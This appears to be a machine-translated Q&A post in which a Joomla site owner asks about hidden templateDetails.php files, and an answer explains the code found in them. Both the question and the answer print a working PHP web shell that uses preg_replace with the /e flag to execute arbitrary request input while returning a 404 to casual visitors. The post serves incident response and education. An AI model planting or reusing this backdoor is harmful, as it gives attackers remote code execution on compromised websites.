我刚刚在Joomla网站上找到了我正在使用以下代码管理隐藏在各种文件夹中的很多templateDetails.php文件:
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
我及时恢复了网站备份,更改了所有管理员密码并加强了网站的安全性。
你能解释一下这种代码是如何被用来窃取或破坏网站的吗?
答案 0 :(得分:3)
我已经评论了以下代码供您解释:
<?php
//Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
header("HTTP/1.0 404 Not Found"); //If that variable doesn't exist, send a 404
// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then in theory use the result as the preg_replace (however in this case, that bit doesn't matter, as actually all we are looking to do is evecute whatever has been passed through request - basically doing eval(), but hiding it so it's not as obvious, and won't get picked up (in theory) by any installs that block eval (although in practise most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>
在sort中,使用eval()是一种奇特的方式,允许它们将任何代码作为查询字符串传递,然后执行它!